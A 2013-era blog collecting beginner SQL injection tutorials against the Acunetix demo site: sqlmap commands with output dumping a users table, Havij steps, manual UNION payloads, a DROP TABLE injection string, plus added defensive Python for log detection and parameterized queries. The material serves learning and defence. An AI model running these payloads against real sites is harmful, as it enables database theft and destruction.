Monday, November 25, 2013

Sqlmap tutorial for beginners – hacking with sql injection

As we have seen in previous posts, we have successfully done SQL injection with manual queries and with the help of Havij. Now we will do the same exercise with a Linux based tool, sqlmap. I will be using sqlmap on BackTrack 5.
 
Note:- This tutorial is being carried out on the demo test site provided by ACUNETIX; you can also try it on the same website as discussed below.

Sqlmap


Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and extract database names, tables, columns, all the data in the tables, and so on. It can even read and write files on the remote file system under certain conditions. Written in Python, it is one of the most powerful hacking tools out there; sqlmap is the Metasploit of SQL injection.
In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what can be done with such a tool.
To understand this tutorial you should have a thorough knowledge of how database driven web applications work, for example those made with PHP+MySQL.

Vulnerable Urls

Let's say there is a web application or website that has a URL like this
http://testphp.vulnweb.com/product.php?pic=1
and it is prone to SQL injection because the developer of that site did not properly escape the parameter pic. This can be tested simply by trying to open the URL
http://testphp.vulnweb.com/product.php?pic=1'
We just added a single quote to the parameter. If this URL throws an error or reacts in an unexpected manner, then it is clear that the database received the unexpected single quote which the application did not escape properly. So in this case the input parameter "pic" is vulnerable to SQL injection.

Hacking with sqlmap

Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal with the Python interpreter.
python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1"
The above is the first and simplest command to run with the sqlmap tool. It checks the input parameters to find whether they are vulnerable to SQL injection or not. For this, sqlmap sends different kinds of SQL injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system OS, database name and version. Here is how the output might look:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:46:25

[22:46:25] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[22:46:32] [INFO] testing connection to the target url
[22:46:46] [INFO] testing if the url is stable, wait a few seconds
[22:46:48] [INFO] url is stable
[22:46:48] [INFO] testing if GET parameter 'pic' is dynamic
[22:46:48] [INFO] confirming that GET parameter 'pic' is dynamic
[22:46:49] [INFO] GET parameter 'pic' is dynamic
[22:46:50] [INFO] heuristic test shows that GET parameter 'pic' might be injectable (possible DBMS: MySQL)
[22:46:50] [INFO] testing sql injection on GET parameter 'pic'
[22:46:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:46:58] [INFO] GET parameter 'pic' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:46:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:47:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:47:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[22:47:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:47:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[22:47:44] [INFO] checking if the injection point on GET parameter 'pic' is a false positive
GET parameter 'pic' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[22:48:03] [INFO] manual usage of GET payloads requires url encoding
[22:48:03] [INFO] testing MySQL
[22:48:04] [INFO] confirming MySQL
[22:48:06] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[22:48:06] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 22:48:06
So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive, but it's time to move on and see what more this tool is capable of.
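Seen from the server side, the run above leaves a recognisable trace in the web server's access log: dozens of requests to the same script and parameter within a couple of minutes, parameter values carrying a stray quote or numeric comparisons such as AND 3512=3512, and, unless the operator changed it, a User-Agent header naming sqlmap. The following Python script is an added example (not part of the original post and not sqlmap's own code) that parses a few constructed nginx-style combined-format log lines, URL-decodes the query string and flags the probe patterns from this post as well as the ORDER BY, UNION SELECT and information_schema forms used in the UNION tutorial further down. The log lines, IP addresses, timestamps, the combined log format and the exact sqlmap User-Agent string are all assumptions constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format log lines (not real traffic). The first four mimic
# the boolean-blind probing seen in the sqlmap run above, the next two the manual
# ORDER BY / UNION probes from the UNION tutorial, the last one an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Nov/2013:22:46:32 +0000] "GET /product.php?pic=1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [25/Nov/2013:22:46:48 +0000] "GET /product.php?pic=1%27 HTTP/1.1" 200 4890 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [25/Nov/2013:22:46:58 +0000] "GET /product.php?pic=1%20AND%203512%3D3512 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [25/Nov/2013:22:46:59 +0000] "GET /product.php?pic=1%20AND%203512%3D3513 HTTP/1.1" 200 4890 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.4 - - [25/Nov/2013:22:47:10 +0000] "GET /product.php?pic=1%20order%20by%2012-- HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Nov/2013:22:47:15 +0000] "GET /product.php?pic=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables-- HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
192.0.2.9 - - [25/Nov/2013:22:47:20 +0000] "GET /product.php?pic=2 HTTP/1.1" 200 5011 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicators are matched against the percent-decoded parameter values, so
# encoded spaces and quotes do not hide the payload from the patterns.
INDICATORS = [
    ("boolean-comparison", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-enumeration", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("quote-or-comment", re.compile(r"'|--")),
]


def parse_line(line):
    """Split one access log line into fields; returns None for unparseable lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query)  # decoded (name, value) pairs
    return rec


def classify(rec):
    """Return the list of indicator names that fire for one parsed request."""
    hits = []
    for name, pattern in INDICATORS:
        if any(pattern.search(value) for _, value in rec["params"]):
            hits.append(name)
    # Assumed default sqlmap User-Agent; operators can override it, so this is
    # a weak signal on its own and is only combined with the payload patterns.
    if "sqlmap" in rec["ua"].lower():
        hits.append("sqlmap-user-agent")
    return hits


def scan_log(text):
    """Return one finding per request that matched at least one indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "target": rec["target"], "hits": hits})
    return findings


def burst_sources(findings, threshold=3):
    """Source addresses with at least `threshold` flagged requests (automation signal)."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["ts"], f["target"], ",".join(f["hits"]))
    print("burst sources:", burst_sources(found))
```

The per-source count matters as much as the signatures: a single request containing a quote is often a typo, while the 32 requests sqlmap needed in the run above all come from one address within seconds, which is what the threshold in burst_sources is meant to surface.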

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.
$ python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dbs
The output could be something like this

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:52:32

[22:52:32] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[22:52:32] [INFO] resuming injection data from session file
[22:52:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:52:43] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[22:53:00] [INFO] manual usage of GET payloads requires url encoding
[22:53:00] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[22:53:00] [INFO] fetching database names
[22:53:00] [INFO] fetching number of databases
[22:53:00] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[22:53:00] [INFO] retrieved: 2
[22:53:10] [INFO] retrieved: information_schema
[22:55:42] [INFO] retrieved: acuart
available databases [2]:
[*] acuart
[*] information_schema

[22:56:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 22:56:41
The output shows the existing databases on the remote system.

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'acuart'.
Command
$ python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --tables -D acuart
and the output can be something similar to this
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:57:38

[22:57:38] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[22:57:38] [INFO] resuming injection data from session file
[22:57:38] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:57:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[22:57:56] [INFO] manual usage of GET payloads requires url encoding
[22:57:56] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[22:57:56] [INFO] fetching tables for database: acuart
[22:57:56] [INFO] fetching number of tables for database 'acuart'
[22:57:56] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[22:57:56] [INFO] retrieved: 8
[22:58:06] [INFO] retrieved: artists
[22:59:32] [INFO] retrieved: carts
[23:00:48] [INFO] retrieved: categ
[23:01:23] [INFO] retrieved: featured
[23:02:43] [INFO] retrieved: guestbook
[23:04:33] [INFO] retrieved: pictures
[23:05:54] [INFO] retrieved: products
[23:07:01] [INFO] retrieved: users
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[23:07:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 23:07:56
Isn't this amazing? It is, of course. Let's get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.
$ python ./sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --columns -D acuart -T users
The output can be something like this


    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 23:13:34

[23:13:34] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[23:13:35] [INFO] resuming injection data from session file
[23:13:35] [INFO] resuming back-end DBMS 'mysql 5' from session file
[23:13:56] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pic
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 3512=3512 
---

[23:14:14] [INFO] manual usage of GET payloads requires url encoding
[23:14:14] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[23:14:14] [INFO] fetching columns for table 'users' on database 'acuart'
[23:14:14] [INFO] fetching number of columns for table 'users' on database 'acuart'
[23:14:14] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[23:14:14] [INFO] retrieved: 8
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[23:37:09] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 23:37:08
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part: extracting the data from the table. The command would be
$ python ./sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dump -D acuart -T users
The above command will simply dump the data of that particular table, very much like the mysqldump command.
The output might look similar to this
+----+-----------+--------------------+---------------------+-----------------+------------+------+---------+-------+
| id | address   | cart               | cc                  | email           | name       | pass | phone   | uname |
+----+-----------+--------------------+---------------------+-----------------+------------+------+---------+-------+
| 1  | 21 street | c47bc05e91244bc272 | 1234-5678-2300-9000 | email@email.com | john Smith | test | 2323345 | test  |
+----+-----------+--------------------+---------------------+-----------------+------------+------+---------+-------+
See, here you got the login details right away. sqlmap will also create a CSV file containing the dumped data for easy analysis.

Disclaimer:- This post should be used only for learning purposes and with the permission of the admin of the application. The admin of this blog doesn't hold any responsibility if readers do any malicious activity on any third party application.

Thursday, November 21, 2013

Havij... A Tool to hack the website with SQL Injection

As we saw in our previous post, we can use several SQL queries in the infected URL to get the database details and tables. Now we can find the same results with many automated tools. One of the popular tools is Havij, an advanced SQL injection tool which makes SQL injection very easy for you. Along with SQL injection it has a built-in admin page finder which makes it very effective.

Supported Databases With Havij
  • MsSQL 2000/2005 with error
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)
Many of the features are not available in the free version, but for learning purposes this tool is still very useful.

Note:- This tutorial is being carried out on the demo test site provided by ACUNETIX; you can also try it on the same website as discussed below.

Step 1: Find a SQL injection vulnerability in your site and insert its URL (like http://testphp.vulnweb.com/product.php?pic=1) in Havij. Now click on the Analyze button as shown below.
Step 1 (screenshot)
Step 2 (screenshot)

Step 2: Now, if your server is vulnerable, the information about the target will appear and the columns will appear as shown in the picture.
Step 3: Now click on the Tables button and then click the Get Tables button from the column below as shown below:
Step 4: Now select any one table and then click the Get Columns button as shown below:

Step 3 (screenshot)
Step 4 (screenshot)

Step 5: Now select the desired columns and click on Get Data to get the result as shown below:
Step 5 (screenshot)


Disclaimer:- This post should be used only for learning purposes and with the permission of the admin of the application. The admin of this blog doesn't hold any responsibility if readers do any malicious activity on any third party application.

Tuesday, November 19, 2013

SQL Injection is not a cup of cake... (2) UNION based SQL Injection

Hello friends, as we have seen in the previous post what SQL injection is and how it can help us gather some data, now we will proceed with how many types of SQL injection are possible. There are many kinds of SQL injection, around 12 to 15. Some important types are:
  • Union Exploitation technique
  • Boolean Exploitation technique
  • Error based Exploitation technique
  • Out of band Exploitation technique
  • Blind SQL Injection
Today we will concentrate on UNION based SQL Injection.

Note:- This tutorial is being carried out on the demo test site provided by ACUNETIX; you can also try it on the same website as discussed below.

Vulnerable Urls

Let's say there is a web application or website that has a URL like this
http://testphp.vulnweb.com/product.php?pic=1
and it is prone to SQL injection because the developer of that site did not properly escape the parameter pic. This can be tested simply by trying to open the URL
http://testphp.vulnweb.com/product.php?pic=1'
We just added a single quote to the parameter. If this URL throws an error or reacts in an unexpected manner, then it is clear that the database received the unexpected single quote which the application did not escape properly. So in this case the input parameter "pic" is vulnerable to SQL injection.


# Find the number of Columns.

  • We found a SQL injection vulnerable website; now it's time to find the number of columns present in the database.
  • To do that, replace that single quote ( ' ) with an "Order By no." statement until you find the error message. Change the number from 1,2,3,4,5,6,7,8,9,... until you get an error message like "Unknown Column".
    For example, change it to Order By 1,2,3,4 like the example below:
http://testphp.vulnweb.com/product.php?pic=1 order by 1--

http://testphp.vulnweb.com/product.php?pic=1 order by 2--
http://testphp.vulnweb.com/product.php?pic=1 order by 3--  and so on...
  • If you get an error on Order By 9, that means the DB has 8 columns, and if you found the error on Order By 6 then the DB has 5 columns. I mean, if you put Order By 12 and suppose the DB has only 11 columns, then the website will show an error like this: An error occurred  Unknown column '12' in 'order clause'.
# This trick is used to find the number of columns in the DB. Understand the example below and you will get to know.

Here, my vulnerable website showed an error on Order By 12, which means my vulnerable website has 11 columns in its DB. So now I have found the number of columns in my DB :- Number of Columns = 11

# Find the Vulnerable Column.

Basically, if the website is vulnerable then it has a vulnerability in one of its columns, and now it's time to find out which column. We have successfully discovered the number of columns present in the database; let us find the vulnerable column by using the query "Union Select columns_sequence". Also change the ID value to negative: suppose the website has the URL product.php?pic=8, change it to product.php?pic=-8. Just put a minus sign "-" before the value of pic.

    For example, if the number of columns is 11 then the query is as follows:

http://testphp.vulnweb.com/product.php?pic=-1 union select 1,2,3,4,5,6,7,8,9,10,11--

    And if the above method doesn't work then use the method below:
http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11--
  • Once the query has been executed, it will display the number(s) of the vulnerable column(s) on the page.
  • In the above result, I found the vulnerable columns 7, 2, 3, 9 and 4. Let's take 2 for our tutorial. Now that we have found our vulnerable column, let's proceed to the next step.

 

# Finding version, Database and User

Now we have to find out the website's database version, user, database name and some other information. Just replace the vulnerable column number with "version()".

For example:
http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11--
Now hit Enter and you will get the result.
Now again do the same, replacing the vulnerable column with a different query like database() or user().

And if the above method doesn't work then use the method below:
http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--

# Finding the Table name

  • Now that we have found the vulnerable column, DB version and user, it's time to get the table names. If the database version is 4 or above then you have to guess the table names (blind SQL injection attack).
  • Let us now find the table names of the database. Here, replace the vulnerable column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".
http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Now hit Enter and you can see the complete table list of the database.

Great, we found the table names; now find the table that is related to admin or users. As you can see in the above image there is one table named users. Let us choose the table users and go on to the next step.


# Finding the Column Name

Now replace "group_concat(table_name)" with "group_concat(column_name)"
and replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".
 

We have to convert the table name to a MySQL CHAR() string.
For that we need to install the HackBar add-on in our Firefox browser. Install the HackBar add-on from this link.

Once you have installed the add-on, you can see a toolbar that looks like the following one. If you are not able to see the HackBar, press F9.
Select SQL -> MySQL -> MySqlChar() in the HackBar.

It will ask you to enter the string that you want to convert to MySQL CHAR(). We want to convert the table name; in our case the table name is 'users'.
Now you can see the CHAR(numbers separated with commas) string in the HackBar toolbar.



Copy and paste the code at the end of the URL in place of "mysqlchar":


 http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--
The above query will display the list of columns.

Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2) and replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".
 http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(users,0x3a,users),3,4,5,6,7,8,9,10,11 FROM users--
If the above query displays a 'column not found' error, then try another column name from the list.
If we get lucky, it will display the data stored in the database depending on your column name. For instance, the username and password columns will display the login credentials stored in the database.


Disclaimer:- This post should be used only for learning purposes and with the permission of the admin of the application. The admin of this blog doesn't hold any responsibility if readers do any malicious activity on any third party application.

Wednesday, November 13, 2013

How to create a penetration test lab in your PC...

Hello friends, as we have already started some tutorials regarding SQL injection, and later my plan is to give several tutorials related to application penetration testing, we definitely require some vulnerable applications for practicing. As ethical hackers we should not do any kind of testing on any live application; therefore security professionals created labs with many vulnerable web apps. So if you are a learner or beginner in hacking, I strongly recommend that you create this lab.

For my own practice I am using two labs: DVWA and the OWASP pen testing lab.

 # What is DVWA ? (Damn Vulnerable Web App)

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment.

 # What is OWASP Penetration Testing Lab

 The OWASP Penetration Testing Lab is also called Top 10 Vulnerability Assessment and Practice. Basically it is created for pen-testers, to learn about vulnerabilities and advanced web application vulnerability components.

 # How to Install DVWA on Windows Platform

Installing DVWA on the Windows platform is very easy; just follow the steps given below.
  • Download DVWA (Damn Vulnerable Web App) and the OWASP pen-test lab files.
  • Download the XAMPP server for Windows.
  • Install the XAMPP server on Windows.
  • Extract all files from the DVWA and OWASP pen test lab archives to the desktop.
  • Then go to C:\xampp\htdocs, delete all files from that folder and leave it empty.
  • Copy the entire "DVWA" folder to "C:\xampp\htdocs".
  • You can also copy Mutillidae, i.e. the OWASP pen test lab files, to the same directory "C:\xampp\htdocs".
  • Now start the XAMPP Control Panel and start [Apache] and [MySQL].
  • Now just open your browser, type 127.0.0.1 and hit Enter; now you can choose which application you want to run. Click on the folder and start.


Friday, November 8, 2013

SQL Injection is not a cup of cake... (1)

What is SQL Injection:

I have gone through many SQL injection tutorials before writing this post. One thing was common at every place: the queries coming from the readers. Many people don't know what SQL injection actually is. They think that they can easily enter the database and make some changes, or that they can simply inject some query and will have the username and password of the administrator. Well, to some extent the concept is true, but it is not that easy.

So first we need to learn what SQL injection is, or better, what SQL is. SQL, the Structured Query Language, is the standard for accessing databases. Most web applications today use an SQL database to store persistent data for the application, so it is likely that any web application you are testing uses an SQL database in the backend. Like many languages, SQL syntax is a mixture of database instructions and user data. If a developer is not careful, the user data could be interpreted as instructions, and a remote user could perform arbitrary instructions on the database. So, whenever we want data to be accessed from an application, our request goes to the database in the form of SQL queries. Suppose, for example, that in an online library we want to access a particular book; then our request will go in the form of the following query,

 "SELECT booktitle FROM my_library WHERE bookname='" + SQLtutorial + "'";
So, in the above case the application takes the bookname from the user, searches for it in the table named my_library and, if it matches, returns that particular page. So if that particular name doesn't match it should not return anything, but in the actual scenario there is nothing stopping an attacker from injecting SQL statements in the bookname field to change the SQL query. Let's re-examine the SQL query string.
  "SELECT booktitle FROM my_library WHERE bookname='" + SQLtutorial + "'";
The code expects the bookname string to be data. However, an attacker can input any characters he or she pleases. Imagine if an attacker entered the bookname ' OR 1=1 --  then the query string would look like this:
SELECT booktitle FROM my_library WHERE bookname='' OR 1=1 -- '
Note:- The double dash (--) tells the SQL parser that everything to the right is a comment.

The SELECT statement now acts much differently, because it will now return booktitle where the bookname is a zero length string ('') or where 1=1; but 1=1 is always true! So this statement will return all the booktitles from my_library. In this case, the attacker placed SQL instructions (' OR 1=1 --) in the bookname field instead of data.

Choosing Appropriate SQL Injection Code:

To inject SQL instructions successfully, the attacker must turn the developer's existing SQL instructions into a valid SQL statement. Generally, queries like these work:
  • ' OR 1=1 --
  • ') OR 1=1 --
Also, many web applications provide extensive error reporting and debugging information. For example, attempting ' OR 1=1 -- blindly in a web application often gives you an educational error message like this:

Error executing query: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near 'SELECT (title, body) FROM blog_table WHERE cat='OR 1=1' at line 1
This particular error message shows the whole SQL statement. In this case, it appears that the SQL database was expecting an integer, not a string, so the injection string OR 1=1 --, without the preceding apostrophe, would work.
However, the attacker could inject other queries. For example, setting the username to this,
 ' OR 1=1; DROP TABLE user_table; --
would change this query to this,
SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE user_table; -- ' AND password = PASSWORD('x');
which is equivalent to this:
SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE user_table;
This statement will perform the syntactically correct SELECT statement and then erase the user_table with the SQL DROP command.
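To see concretely why the concatenated query above is the problem and what the fix looks like, here is an added Python example (not from the original post) that uses the standard sqlite3 module as a stand-in for MySQL. The vulnerable lookup builds the statement by string concatenation exactly as the post's pseudo code does, while the safe version passes the bookname as a bound parameter, so ' OR 1=1 -- is compared literally against the column instead of being parsed as SQL. A second pair of functions does the same for an integer product id like the pic parameter in the UNION tutorial above, where strict type validation rejects a non-numeric value before it ever reaches the database. The table contents, the products table and the row values are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the post's my_library table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE my_library (booktitle TEXT, bookname TEXT)")
    conn.executemany(
        "INSERT INTO my_library VALUES (?, ?)",
        [("SQL Tutorial", "SQLtutorial"),
         ("Network Basics", "netbasics"),
         ("Crypto 101", "crypto101")],
    )
    # Hypothetical products table for the integer-id case (product.php?pic=...).
    conn.execute("CREATE TABLE products (pic INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "Blue"), (2, "Red")])
    return conn


def find_book_vulnerable(conn, bookname):
    # Same construction as the post: user data is pasted into the statement text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT booktitle FROM my_library WHERE bookname='" + bookname + "'"
    return [row[0] for row in conn.execute(sql)]


def find_book_safe(conn, bookname):
    # Parameterized query: the statement text is fixed and the value travels
    # separately, so quotes and comment markers inside it stay plain characters.
    sql = "SELECT booktitle FROM my_library WHERE bookname=?"
    return [row[0] for row in conn.execute(sql, (bookname,))]


def product_vulnerable(conn, pic):
    # Integer parameter concatenated without quotes: no quote is even needed to
    # inject, which is why pic=-1 union select ... works against code like this.
    sql = "SELECT name FROM products WHERE pic=" + pic
    return [row[0] for row in conn.execute(sql)]


def product_safe(conn, pic):
    # Validate the type first, then bind: anything that is not a plain
    # non-negative integer never reaches the database.
    if not pic.isdigit():
        raise ValueError("pic must be a non-negative integer")
    sql = "SELECT name FROM products WHERE pic=?"
    return [row[0] for row in conn.execute(sql, (int(pic),))]


def _rejects(call):
    """True if the call raises ValueError (input rejected before the query)."""
    try:
        call()
    except ValueError:
        return True
    return False


def demo():
    """Run the four lookups on normal and injected input and return the results."""
    conn = make_db()
    tautology = "' OR 1=1 --"
    union = "-1 union select bookname from my_library--"
    return {
        "normal_vulnerable": find_book_vulnerable(conn, "SQLtutorial"),
        "normal_safe": find_book_safe(conn, "SQLtutorial"),
        "tautology_vulnerable": sorted(find_book_vulnerable(conn, tautology)),
        "tautology_safe": find_book_safe(conn, tautology),
        "union_vulnerable": sorted(product_vulnerable(conn, union)),
        "union_safe_rejected": _rejects(lambda: product_safe(conn, union)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On normal input both versions return the same book; on the tautology the concatenated version returns every title in the table while the bound version returns nothing, and the UNION payload makes the concatenated product lookup return rows from a completely different table, which is the exact leak the information_schema queries above rely on.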

So, that's all for the first tutorial on SQL injection. In upcoming tutorials we will see more types of SQL injection and some more commands and tools to exploit this vulnerability; till then keep practicing.

Disclaimer:- This post should be used only for learning purposes and with the permission of the admin of the application.